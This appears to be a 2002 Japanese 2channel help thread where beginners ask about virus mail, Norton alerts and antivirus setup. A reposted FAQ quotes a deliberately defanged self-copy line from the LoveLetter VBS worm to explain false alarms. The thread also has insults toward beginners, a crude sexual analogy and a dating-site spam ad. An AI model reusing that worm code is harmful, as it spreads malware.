809 :
786 :02/07/15 17:42 ID:mO5N6krc
>>809 ウイルシかもしんないから、ソッコーで削除してスキャンせい!
812 :
786 :02/07/15 17:57 ID:???
>>810 今は全て捨てるようにしています。
>>811 スキャンしても何も出てこないのですが、あまりにも怪しさ大爆発なので
気になってしょうがないです。何回か開いちゃったし。
814 :
786 :02/07/15 18:11 ID:???
>何回か開いちゃったし これが「致命的」!!リカバリすれ。
>>786 で? HOTMAILなんて個人情報がだだ漏れのwebメール使って、
SPAMやウィルスメールが来ないほうがおかしいと思わないのか?
ほっとけ。
817 :
786 :02/07/15 18:18 ID:???
>>815 わかりました。リカバリます。
答えてくれた方々、どうもありがとうございました。
>>786 ある日突然自宅に差出人不明の怪しい小包が届きました。
開けてみたところ爆弾が作動して肘から先が木端微塵に吹き飛びました。
こんな話を聞いて、人はどう思う?
差出人に対して、ヒドいことするなぁと思う一方で、
開けた奴に対しては、なんでそんなもん開けるの?バカじゃねーの?
と思うでしょう。今まさに、あなたはそう思われているのですよ(^^
820 :
ひよこ名無しさん :02/07/15 18:27 ID:7h/9jpzL
最近2chで書き込むとウィルスに感染しましたって出るんだけど みんな出てない? VBS.LoveLetter.A これってどうすればいいの?
>>820 ある日突然自宅に差出人不明の怪しい小包が届きました。
開けてみたところ爆弾が作動して肘から先が木端微塵に吹き飛びました。
こんな話を聞いて、人はどう思う?
差出人に対して、ヒドいことするなぁと思う一方で、
開けた奴に対しては、なんでそんなもん開けるの?バカじゃねーの?
と思うでしょう。今まさに、あなたはそう思われているのですよ(^^
トンマなヤツはここをよく読め!
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/ 1 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。
基本(この問題について)
>>2 既知の2chで話題になってるvbsソース
>>3 2 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。
3 名前:名無しさん@お腹いっぱい。[] 投稿日:02/07/05 21:31
■既知のvbsウィルスのソース■
・VBS.Internal
出元は
http://tmp.2ch.net/test/read.cgi/download/1025717301/ の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?
シクシクゴメンナサイトンマッテイワレタコトノホウガショックダタヨ
トノマならほめ言葉づら。
827 :
神之助 :02/07/15 21:44 ID:LktoAJ4d
たまに別のスレに逝くと、ノートンアンチウィルスが察知して「感染していまし た」などという画面がたまにでてきます。あれはなんなんですか?
>>827 おまえは1つ前の書き込みも読まずに恥ずかしいと思わないのか?
>>830 煽りはスピードが命。
素人さんは帰ってくれや。
2月にXP(Home Edition)のパソコンを買ったんですが ウィルス対策用のソフトは何を買えばいいでしょうか? ネットはインターネットマンションなのでLANでつなぎっぱなしになるので ファイアーウォールとかいうのも要るのでしょうか?
>>833 ありがとうございます。
それにします。
836 :
835 :02/07/16 10:46 ID:lEKsIain
837 :
ひよこ名無しさん :02/07/16 10:56 ID:fHO5bszG
微妙にスレ違いかもしれませんが質問させてください・・・ セキュリティーソフトのウィルスバスターとノートンはどちらの方が売れているのですか? また、どちらの方が性能が上ですか? それと私は、ウィルスバスターを常駐させてるけど、起動時間が最低一分は長くなったり、 HPを開くスピードが遅くなったりしてるんだけど、皆さんもそうなるのですか?
>>837 ウイルスバスタ2002使っているが起動時間は入れる前とほとんどかわりないけどねぇ〜
839 :
ひよこ名無しさん :02/07/16 11:14 ID:zDZeyw2b
すいません、数ヶ月ぶりでこのスレに来たんですがフレゼムタンは流行りそうですか? 酷くなるようなら初心者の多い自サイトに警告メッセージ出そうと思っております。
841 :
初心者 :02/07/16 12:24 ID:l3ZzKLKm
すみません、どなたか宜しくお願い致します。 昨夜知人よりKLEZと思われるものが送信されてきました。 赤い英語の文字で書かれた内容でした。 私のパソコンはwindows98、IE6.0 です。 やはり感染したのでしょうか? outlookのアドレス帳先には、私に送られてきたようなものは まだ送られていないようです。 どなたか教えて下さい、お願い致します。
>>841 >やはり感染したのでしょうか?
ウイルススキャンして下さい。お願いします。
>>841 すぐ上のレス見た上での書き込みですか?
>★ウイルスでしょうか?なんて悩んでる人は質問の前に
>>1-16 を読もう!
と書いてますけど
844 :
841 :02/07/16 13:28 ID:WAZliitu
>>842-843 さま、ありがとうございました。
ウィルススキャンしました。
全てのファイル・プログラムファイル・圧縮ファイル
感染している項目はありませんとなりました。
スキャンしても定義ファイルがアップデートしていないと無駄だという罠
846 :
ひよこ名無しさん :02/07/16 14:39 ID:cnD4s0F3
ウイルスに感染してしまい、すぐに友達に連絡して メールはすぐに削除するように頼んだのですが友達にも感染してしまいました。 その子の職場のPCがそのウイルスのせいでクラッシュして仕事どころではなく、 処理に追われているようなのですが、その友達に対して、 どのような対処(?)をしたらいいのかわからないのです。 友達の職場のPCを復旧させるなど、もちろんそんな術などありません。 でも本当に申し訳なくて、もうどうしたらいいのかわかりません。 板違いのような気もするのですが、よろしくお願いします・・・
>>846 ここの回答者はそういう経験をするのが嫌で
こまめに対策している人達が主だと思われ。
>>846 ウイルス対策をしてなかった自分自身を呪え!損害賠償が
発生するかもしれないからそのつもりで。
住○生命の元気だネットにアドレスを登録していたらウイルスメールが いぱーいきました。W32.Frethem.K@mmウィルスなので注意してね
>>848 その場合、損害賠償はかなりの額だと思われ。
>>850 生命保険会社がウイルスメールを撒くとは・・・世も末だな。w
>852 国会議員のセンセイがウィルス撒いてた事もあったよ と今更なレスをしてみる
855 :
846 :02/07/16 14:52 ID:cnD4s0F3
>847・848・849 とりあえず友達に経過を聞きながら待ってみます。 未だにウイルスは遠いどっかの事みたいに思ってた自分が情けないです。 レスありがとうございました。
>>855 今すぐ、ウイルス対策ソフトを買え!最低限のことはしろ。
ヤなら、ネットするな。
857 :
846 :02/07/16 14:59 ID:cnD4s0F3
>856 もちろん買いました。ウイルスバスター2002の2枚入っているのを買って、 一枚は友達に渡してきました。 それ以上に何かできる事があればと思って書き込みました・・・
それはそれでライセンス違反のような…つーか、そんなお徳用パックみたいな パッケージ形態してるのバスターは?
>>857 「ウイルス定義」の更新はしていたのか?メーラーのプレビューはOFF
にしていたのか?怪しげなメールは削除していたのか?・・・対策は尽きない。
ノートンなら2ライセンスパッケージというのがあったような…
862 :
846 :02/07/16 15:07 ID:cnD4s0F3
>858 ラ、ライセンス違反?! 2ユーザーパックというのがあったので、普通に2枚入りと思って買って すぐに渡してしまいました・・・ >859 このスレ見てこれから勉強しようと思います。
>>861 それはあった気がする。バスターであったかなぁ・・。
>>862 ちょっと聞くけど、「ウイルス定義」の更新してたの?
なるほどねぇ。私も勉強不足だなぁ。
866 :
846 :02/07/16 15:13 ID:cnD4s0F3
>863 お恥ずかしいのですが今まで何の対策もしていませんでした。
>>866 じゃ、今からやってくださいな。おながいしますよ。w
868 :
846 :02/07/16 15:19 ID:cnD4s0F3
>867 はい。わかりました。 「ウイルスの定義の更新」自体何かよくわからないので 今から調べて、それからやってみます。ありがとうございました。
>868 ウイルスバスター2パックは他人に渡すとライセンス違反です。
>>868 明らかに「ライセンス違反」。
本製品は、第三者に対して、賃貸、賞与、販売、ならびに譲渡するこ とはできません。但し、同一のお客様がお使いになるPC2台(及び2OS)、または同一世帯、同一事業所内に設置されている2PC(及び2OS)でお使いになる場合、この規定は適用されません。
と書いてあるじゃん!友達に渡しちゃダメだよ。
871 :
846 :02/07/16 15:28 ID:cnD4s0F3
>869 そうなんですか?! じゃ、私が持っている方も友達に渡してきます・・・
>>869 あ、ほんとだ、鋭い指摘。
1人の顧客が2台のPCにインストールする権利で譲渡不可だもんね。
>>871 それで自分の分あらたに買うなら
新しく買ったほうを渡せば?
つーかそいつも対策してないのが悪いんだが
>>871 お友達に渡してある分を回収して、ご友人には新規に購入してもらわないとダメですね。
つーか、今まで全くウィルス対策してないわけですか。不特定多数の人間とスキン無しで
性交してるのと同義ですよ。
いや、以前このスレでテンプレになってた奴が忘れられなくて… ナマでパコパコ…とかいうやつ。
878 :
しんふい :02/07/16 15:38 ID:15osui4/
Windows XP を買いたいのですが、今新品の最低価格っていくらぐらいでしょうか?
880 :
846 :02/07/16 15:39 ID:cnD4s0F3
>872〜875 なんかパニクってしまって訳アホな事ばかり言ってしまってすいません。 新しく買って渡しに逝ってきます。
>>877 あ、なるほど・・・。いや、エッチな荒タンだから、それに掛けたのかと
思ってますた。w
882 :
しんふい :02/07/16 15:41 ID:15osui4/
あ、ごめんなさい。ウイルスのスレットにかいてしまった・・・。 失礼しました。
883 :
しんふい :02/07/16 15:42 ID:15osui4/
879さん レスどうもです・・・。OSです。
日本橋ならワゴン車のおっさんから5Kで・・・
荒タン(*・∀・*)ヤーネェ
>>877 「ナマでパコパコ」・・・(・∀・)イイ!!
ナマでパコパコ!!!! インターネット=ソープランドのマンコ パソコン=チンコ これでもナマでヤリますか? 淋、蔵まみれになりますか?
>>888 ソープランドのマンコ のほうが安全かもしれん
>>888 そうそう、これこれ。よく出来てると思いますが、実際ソープのおねーちゃんのほうが
アマチュアの人より対策済みな気もしますね。
彼岸さんはソープ経験あり、っと・・・φ(・∀・ )
実際、素人女の方がぁ ゃ ι ぃ 。風俗なら定期健診してるし 「ウイルシ」持ってたら治るまで店に出られないからなぁ。
>>893 「ウイルシ」は治せるの?人間は再インストールできないよ。
菌とかクラミジアは削除できるでしょうけど、、、
>>893 そんなことあったのはバブル期の頃の話でして・・・
バブルはじけちゃった今では・・・
やってないのか・・・欝だ。
ウイスル対策してない奴も性病対策してない奴もみんな死んでしまえ
「性病対策」はさしずめ「イソジン」と「ムーゴしかないのか・・・。 怖いな、淋しい病気。
905 :
ひよこ名無しさん :02/07/16 18:07 ID:B7f3+GLc
ウイルスをMcAfeeが検知して、削除しました。 管理者からの報告によるとw32.frethem.j@mmというウイルスだそうで、 passwordがどうのこうのという文章で騙して感染させてしまうらしいです。 そのあと別のメールが来て、よくみると本文のあとに大量の文字化けと ”Your Password is ほにゃらら” という不穏な英文がついていました。 これは相手のマシンが感染しているということなのでしょうか。 既にプレビューで見てしまったのですが、影響はないでしょうか。 ウイルス初心者ですみませんが教えてください。
>>905 > 既にプレビューで見てしまった
もうだめぽ
>>905 最新のウイルス定義ファイルで全ドライブ検索して下さい。お願いします。
できればMcAfeeをアンインストールして、ウイルスバスターかノートンにして下さい。
908 :
905 :02/07/16 18:25 ID:B7f3+GLc
うわああん。ごめんなさい。汗ってtいるせいか定義ファイルの更新方法がぜんっぜんわかりません。 他のすれでも言われたけどここも上のレスをよくみると馬鹿フィーとか書いてあるし。 非常に申し訳ないのですが、至急教えてください。
910 :
905 :02/07/16 18:38 ID:B7f3+GLc
馬鹿フィーのサイトから定義ファイルをダウンロードして Zipを解凍しました。ここからどうすればいいのか不安です。 VALIDATE.EXEというのを実行すればいいのですか?
911 :
905 :02/07/16 18:40 ID:B7f3+GLc
913 :
905 :02/07/16 18:43 ID:B7f3+GLc
あれっ!?プロパティなんかないぞ。どういうことだ。 あかん、疲れてきた。今日は情報ケーブル抜いて帰ります。 明日ゆっくり考える。
915 :
905 :02/07/16 18:54 ID:???
>>914 お気遣いすみません。
管理者でないとダメみたいです。もうめんどくさくなってきた。
>>915 じゃ、明日にしたら?上司いないんでしょ?w
sa
919 :
ひよこ名無しさん :02/07/16 22:02 ID:o5FLqiGQ
ウイルス解説のページなどを見てみたのですが、分からなかったので質問します。 メール受信中に途中で止まり、「不正な処理を行ったため〜」と出て、 Outlookが強制終了されてしまいます。 何度受信しても特定のメール(18件中8件目)で強制終了になってしまい、 7通目までのメールは同じものが何度も受信されるのですが、8通目以降の メールが受信できません。この8通目のメールがウイルス?なのでしょうか? 初心者なもので、ものすごくくだらない質問でしたらスマソです。 分かる方いらしたら教えてください。
921 :
ひよこ名無しさん :02/07/16 22:52 ID:ASCA3xB7
至急です。 ファイルが添付されたメールの削除法を教えてください。 OSはウインドウズ98でiEは5、5です。 あっもちろんノートンでウィルススキャンやりまして まったく出なかったのです。
なにが、至急です、だよボケが。 てめーの都合なんぞ知ったことじゃねぇんだよカス
こらっ初心者が真面目にそうだんしているんだよ。
>>921 メールの質問をするならメールのクライアントソフトを書いたほうがいいぞ。
ブラウザメールなのか?
>>921 あと、POPサーバなのか、IMAPなのかも書いてくれ。
>>921 メールがプレビューされないようにしてから、メールを選択し
削除ボタンを押す。
削除済アイテムホルダを空にする
以上。
OEです。
>>927 さん
適切なアドバイスをありがとう。
早速削除してみます。
また「あほ・ばか」言われそうだけどメールがプレビューされないようにしてと
いうのはどういうふうにしたらいいのですか。
>>935 目を閉じて、キーボードで操作。
添付ファイルがグロ画像だった時にも安心。
>>935 ツール→オプションでできるけど、OEは使わない方がいいよ。
違うメーラーにしちゃえば?
941 :
ひよこ名無しさん :02/07/16 23:18 ID:ASCA3xB7
>>937 ついつい野鳥板のくせでID隠してしまった。
ホンモノ キタ━━━━(゚∀゚)━━━━!!
>>941 OEなら 表示→レイアウトでプレビューウインドウを表示するの
チェックをはずしてOKボタンを押す。
なにが、至急です、だよボケが。 てめーの都合なんぞ知ったことじゃね
947 :
921 :02/07/16 23:28 ID:ASCA3xB7
949 :
:02/07/16 23:48 ID:ZCG8Zead
ウイルスに関して質問です。 板違いで誘導されてきました。 IEコンポーネントをHTMLメール表示の手段に用いているメーラというのは 具体的にどのメーラーか知りたいのですが。 OE、Becky!はわかりました。 あと、Frethemに関してですが、パッチ当ててない場合は プレビューで感染(IEコンポーネントをHTMLメール表示の手段に用いているメーラはすべてだめですよね) 、当ててあれば実行しない限り大丈夫ということで OKでしょうか? プレビューしたらアウトという書き方がありますが、 IE5.5or5.0SP2か6ならプレビューだけでは感染しないのですよね? よろしくお願いします。
>>949 少なくとも、BeckyはIEコンポーネントを使わずに、htmlのテキスト部分のみを
表示する機能があるので、ダメということは無い。
951 :
:02/07/17 00:00 ID:KKwmK3xw
>>950 ありがとうございました。Beckyに関してはユーザーじゃなかったので
よくわかりませんが、切り替え機能?があるのですね。
しつこくて申し訳ないのですが、
パッチ当ててSP2にしてない場合だけプレビューで感染ということで
よろしいでしょうか?
失礼します。
>>951 現在公開されているパッチを全て当てておけばある程度は大丈夫かもしれないが、
セキュリティホールは次々発見されているから、IEを使っている限り安心できない。
>>952 >セキュリティホールは次々発見されているから、IEを使っている限り安心できない。
この世にあるすべてのソフトにおいて言えることかと。
954 :
:02/07/17 00:07 ID:KKwmK3xw
>>952 ありがとうございます。安心しているつもりはないです。
対策はそれなりしますし、しております。
あくまでFrethem(バッドトランスなども?)に関しては
SP2ならいいはずだと思ってたんですが、
ちょっと自信なくなったので。
今後どうかはわからないというのは存じております。
ありがとうございました。またご指導ください。
>>952 俺はもう十年ぐらいIE、OE使っててなんの問題もないが
958 :
ひよこ名無しさん :02/07/17 01:00 ID:CjBVdyp1
新スレは?
>>958 立てれる人間が居ない。誰かが批判要望板にゴルァ!!してくれたら立てたげる
( ゚Д゚)ゴルァ!!
961 :
921 :02/07/17 01:44 ID:hiVAwg9t
ファイルが添付されたメール削除出来ました。 返事が遅くなったのは、ウィルス感染がちょっと心配になり(メール削除のとき あせった)ウィルススキャンをかけていたためです。 もちろんウィルスに感染していませんでした。 2ちゃんねるの大先輩、アドバイスをありがとうがざいました。
>>955 おまえ、OEが生まれて何年か知ってるのか
965 :
921 :02/07/17 13:34 ID:hiVAwg9t
すいません。 2ちゃんねるのセキュリティ板を見ていたら ノートンが作動して「C:\WiNDOWS\Tempor」というファイルが ウィルスに感染しているという表示が出て すぐに検疫(隔離)しました。 ネットから接続を切ってからノートンを見てみたら ウィルスの治療法、ファイルを削除して同じファイルをコピーすることと 出ていました。 でもパソコン初心者の僕にとっては どういうふうにやったらいいのかわかりません。 ファイルを削除しても大丈夫でしょうか? 2ちゃんねるの諸先輩がたよろしくお願いします。 少しあせっています。
967 :
921 :02/07/17 13:50 ID:hiVAwg9t
>>966 読んだけど自分みたいな例が載っていないのです。
970 :
921 :02/07/17 14:10 ID:hiVAwg9t
>969 読むのに長すぎます。 鬱。
■この問題について■ 2chのスレにvbsウィルスのソースを書き込むことによって ブラウザがそのスレのhtmlファイルをダウンロードする際に ウィルスのパターンと一致するので、ウィルスが検出されたと ノートン先生などが騒ぎます。(設定によっては反応しないことも ありますが、全く問題ありません) ご存知の通り、htmlを読んでもこのvbsのソースは実行されること は無いので、全く問題ありません。 また、デフォルトだとIEはInternet Temporary Filesフォルダに htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。 なので、まだ2chで話題に上がって無くても、Internet〜フォルダの htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。 (もちろん、全く問題無い) これらのファイルは削除しても全く問題ありませんが、 該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて しまうので、警告が出ます。
972 :
921 :02/07/17 14:39 ID:hiVAwg9t
あの〜ノートンやウィルス・バスターでスパイ・ウェアをガードまたは削除出来ますか?
976 :
ひよこ名無しさん :02/07/17 20:32 ID:I/PrCLFU
今話題のiモード出会い系サイト今月遂に100万アクセス突破!!
極楽出会いタイム
3つの特典
・非会員でも書込みが除けるよ
・掲示板回覧は常時無料
・もちろんアクセスム無料(PCより回覧可)
http://gdt.jp 一度は見てね。すっごいよ
979 :
ひよこ名無しさん :02/07/17 23:05 ID:qtnpR4Qm
見知らぬ人からメールがイパーイ来ます。件名は必ず英語です。 添付はword2000の特徴と〜.exeです。
980 :
ひよこ名無しさん :02/07/17 23:07 ID:fIVdE548
すいません。 今日っていうかサッキヤフウチャットしていたら、 急にチャットが見れなくなり、いくらログインしてもダメです。 これって、何ですか?
983 :
ひよこ名無しさん :02/07/17 23:15 ID:fIVdE548
マルチポストって何ですか? で、どうしたらイイノ? アラシだったの??
985 :
980 :02/07/17 23:19 ID:fIVdE548
やったんですが、ダメです。 私のログインってもうダメなの???
>>985 「マルチ」には回答を得る権利は喪失します。さよなら。
マルチポスト=同じ質問を複数の場所に投稿すること。 まぁ一種の荒らしみたいなもんです。yahooでも似たようなことしたからじゃない?
>985 iavaが使える状態か? あと自分のIDが生きてるか? この2点を確認 でもyahoochatが落ちてるだけかも
989 :
ひよこ名無しさん :02/07/17 23:23 ID:fIVdE548
idってドレですか? 多分、いきてないかも。
この調子じゃアク禁喰らってても不思議じゃないですね。
>989 とりあえずyahoo mailにログインできるかどうか確かめれ
993 :
989 :02/07/17 23:29 ID:fIVdE548
>991 ヤフ−メ−ルは開けました。
994 :
:02/07/17 23:48 ID:JTvdqvNv
ばいばい〜♪♪♪(⌒∇⌒)ノ""フリフリ
1000
997 :
a :02/07/17 23:50 ID:mJNDQTCG
a
998 :
aa :02/07/17 23:51 ID:mJNDQTCG
aaaa
aaaaaaaaaa
999
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。